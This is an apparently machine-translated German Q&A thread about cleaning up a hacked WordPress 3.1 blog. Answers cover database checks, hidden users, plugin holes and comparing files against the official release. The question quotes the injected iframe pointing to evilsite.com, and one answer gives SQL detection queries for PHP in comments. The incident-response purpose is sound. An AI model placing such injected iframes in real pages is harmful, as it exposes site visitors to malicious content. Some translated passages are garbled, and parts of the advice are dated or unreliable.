Mein unterhaltsamer WordPress-Blog unter http://fakeplasticrock.com (mit WordPress 3.1.1) wurde gehackt - es wurde <iframe>
auf jeder Seite wie folgt angezeigt :
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Ich habe folgendes gemacht
- Upgrade auf 3.1.3 über das integrierte WordPress-Upgrade-System
- Installierte den Exploit Scanner (viele kritische Warnungen bei ungewöhnlichen Dateien) und AntiVirus (dies zeigte alles grün und sauber, so dass ich es deinstallierte und nach dem Ausführen entfernte)
- Geändertes MySQL Passwort.
- Alle WordPress-Benutzerpasswörter wurden geändert.
- Per FTP verbunden und das gesamte Dateisystem heruntergeladen (nicht groß, dies ist ein nur für WordPress freigegebener Linux-Host)
- Das Dateisystem wurde gegen eine offizielle ZIP-Datei von WordPress 3.1.3 ausgetauscht und alles, was nicht übereinstimmt, entfernt oder überschrieben .
Ich bin mir ziemlich sicher, dass
- Alle Dateien auf der Festplatte sind offizielle WordPress 3.1.3-Dateien
- Auf der Festplatte befinden sich keine "zusätzlichen" Dateien außer meiner
/theme
, dem Exploit Scanner-Plugin (das ich gerade heruntergeladen habe), dem/uploads
Ordner und einer kleinen Handvoll anderer erwarteter Dateien. Mein anderes Plugin, wp-recaptcha, entspricht der aktuell offiziell heruntergeladenen Version. - Ich habe auch die
.htaccess
Datei überprüft und nichts sieht dort falsch aus
Ich habe die Datenbank nicht angerührt , habe aber Schwierigkeiten zu überlegen, wie etwas in der Datenbank ohne speziellen PHP-Code bösartig sein könnte , damit es funktioniert.
Mein WordPress-Blog scheint jetzt in Ordnung und hackfrei zu sein (glaube ich), aber gibt es noch etwas, das ich überprüfen sollte?
Antworten:
Haben Sie den Exploit-Vektor identifiziert? Wenn nicht, lassen Sie sich möglicherweise für zukünftige Exploits offen.
Andere Dinge zu beachten:
Ändern Sie das Präfix der DB-Tabelle.htaccess
quelle
Wenn Sie sich die Google Chrome-Meldung "Safe Browsing" ansehen, sehen Sie den ".cc iFrame-Hack", der in letzter Zeit eine Menge zu bieten scheint. Ich denke, 3.1.3 wird das beheben, aber überprüfen Sie Ihre index.php-Datei im Stammverzeichnis, wenn Ihre Site, dort traf es mich so lange, bis ALLES aktualisiert und Passwörter geändert wurden.
Es gibt einige sehr knifflige Sachen, die Leute mit Post- und Kommentar-Injektionen machen können. Sie können die folgenden Abfragen für Ihre Datenbank ausführen, um einige von ihnen zu finden, die ich den Rest meines "Trackings" hier gebloggt habe .
Hoffe das hilft!
quelle
SELECT * FROM wp_* WHERE comment_content LIKE '%<?%'
undSELECT * FROM wp_* WHERE comment_content LIKE '%<?php%'
nur um sicher zu sein ...Die Datenbank kann auch böswilligen Code enthalten: versteckte Benutzerkonten oder Werte, die ungeschützt gedruckt werden. Überprüfen Sie auch Ihr Upload-Verzeichnis auf Dateien, die nicht dorthin gehören.
Oh, und versuchen Sie zu verstehen, wie der Angreifer auf Ihre Website gelangt ist. Bei gemeinsam genutzten Konten ist dies häufig der gesamte Server. Überprüfen Sie die anderen Websites auf dem Server auf gehackte Blogs oder andere Seiten. Lesen Sie Ihr FTP-Protokoll. Wenn Sie nicht wissen, wie es passiert ist, können Sie die nächste Pause nicht verhindern.
quelle
wp_users
Tabelle und nur 2 Zeilen, beide erwartet .. nichts in dem/upload
Ordner ungewöhnlich (nur GIFs und PNGs und JPEGs)Tut mir leid zu hören, dass du gehackt wurdest - anscheinend hast du aber gute Arbeit geleistet!
Ihr Dateisystem klingt golden, ich würde nicht sagen, dass Sie hier noch etwas tun können.
Ich würde denken, Exploit Scanner würde eine Warnung auslösen, wenn es Skripte, Iframes, PHP (obwohl nur gefährlich, wenn es ausgewertet wird) oder anderen ungewöhnlichen Code in Ihrer Datenbank findet.
Ich bin mir nicht sicher, ob es andere Tabellen als Posts und Kommentare überprüft. Vielleicht lohnt es sich,
/wp-admin/options.php
einen kurzen Blick darauf zu werfen und festzustellen, ob Sie etwas Seltsames entdecken.Ich würde auch Ihre Benutzertabelle in einem MySQL-Client überprüfen (Benutzer befinden sich möglicherweise in der Datenbank, sind jedoch im Administrator nicht sichtbar).
quelle
Überprüfen Sie die Google Webmaster-Tools auf zwei Dinge:
Außerdem würde ich das Thema erneut implementieren oder es äußerst sorgfältig überprüfen. Einige PHP-Zeilen können die Kernfunktionen von PHP neu definieren, sodass sie schädlichen Code aus der Datenbank extrahieren, insbesondere die Schlüssel- / Wertspeichertabellen wp_options
quelle
Durchsuchen Sie die Datenbank mit phpmyadmin nach "iframe" oder sichern Sie die Datenbank und durchsuchen Sie den Text.
Suchen Sie in der Benutzertabelle nach unsichtbaren Benutzern. Ich habe Benutzer in den Tabellen gesehen, die in WP Admin >> Users nicht angezeigt wurden.
Optionen bereinigen «WordPress-Plugins zeigen an, welcher Müll von alten und möglicherweise anfälligen Plugins in der Datenbank verbleibt.
In Ihrem Thema fehlt auch das
<head>
Tag, daher würde ich überprüfen, ob Sie das Thema bearbeitet haben, um fehlerhafte Links zu entfernen.Und das Übliche: und wie man eine Hintertür in einem gehackten WordPress- und Hardening-WordPress- «WordPress-Codex findet
quelle
"Gibt es noch etwas, das ich überprüfen sollte?" Sie müssen Ihren Prozess untersuchen und herausfinden, wie Sie gehackt wurden (mit ziemlicher Sicherheit, weil Sie nicht rechtzeitig oder korrekt gepatcht haben) und das auch beheben, nicht nur die Symptome.
quelle
Das ist mir einmal durch ein Leck im Medientempel passiert. Ich musste ein Plugin schreiben, um die Datenbank auf injizierte Links zu überprüfen. Sie können es hier als Github Gist greifen .
Es ist ziemlich benutzerfreundlich, hat mehrere Schritte, die Feedback liefern und Ihre Datenbank erneut prüfen, wenn Sie fertig sind.
Viel Glück!
quelle
Ich hatte einen sehr ähnlichen Hack, den ich auf einer meiner Client-Sites reparieren musste.
Es gab bösartige Skripte im Dateisystem (php base64_decode stuff). Die Tabellen "Posts" und "Comments" der Datenbank waren jedoch kompromittiert worden, und der Iframe-Code war auch in diesen Daten verstreut.
Ich würde zumindest ein paar Suchanfragen in der Datenbank durchführen, um sicherzugehen. :)
quelle
Überprüfen Sie Ihre Plugins! Bisher gab es in diesem Jahr 60 Exploit-Releases von .org-Plugins. Ich würde vermuten, dass die tatsächliche Anzahl viel höher ist, da niemand dies wirklich in Vollzeit tut.
Sie haben angegeben, dass Sie nur ein Plug-in haben, das eine Sicherheitslücke aufweist (nicht sicher, wie lange es nicht verfügbar ist, und es ist möglicherweise nicht der Vektor).
Der Autor gab an, dass er mit Version 3.0 umgeschrieben hat, der Sicherheitspatch wird jedoch nicht erwähnt.
http://www.wpsecure.net/2011/03/wp-recaptcha-plugin/
Änderungsprotokoll: http://wordpress.org/extend/plugins/wp-recaptcha/changelog/
quelle
Ich benutze einen Cloud-Server und habe zufällige verrückte SSH-Portnummern ohne FTP. Passwörter sind extrem schwer zu hacken. Jeder Root-Zugriff wird vollständig verweigert. Ich bin damit einverstanden, dass WordPress nicht Ihr Schuldiger sein wird. Eine andere Sache, auf die Sie achten sollten, ist, dass FTP-Sitzungen nicht geschlossen werden, dass sich auf Ihrem PC ein Virus befindet (denken Sie daran, dass Sie eine Datei auf Ihre Site laden können und wer diese Datei lädt, kann denselben Virus bekommen) und dass Sie Ihre Passwörter nicht auf öffentlichen oder privaten Sites aufbewahren Aufstellungsorte berichtigen sie immer unten auf Papier nie auf einem Wortdokument oder einem Notizblock.
Fragen Sie zuletzt Ihren Host, ob er kürzlich eine Sicherheitslücke hatte, da er eine Firewall einrichten sollte
quelle
Überprüfen Sie das Datum Ihrer Dateien. Keine Datei sollte Änderungsdaten haben, die neuer sind als Ihre letzte Bearbeitung / Installation!
Aber auch das kann man vortäuschen. Am sichersten ist es, alle Dateien mit den ursprünglichen Installationsdateien zu vergleichen (z. B. Hash-Vergleich).
quelle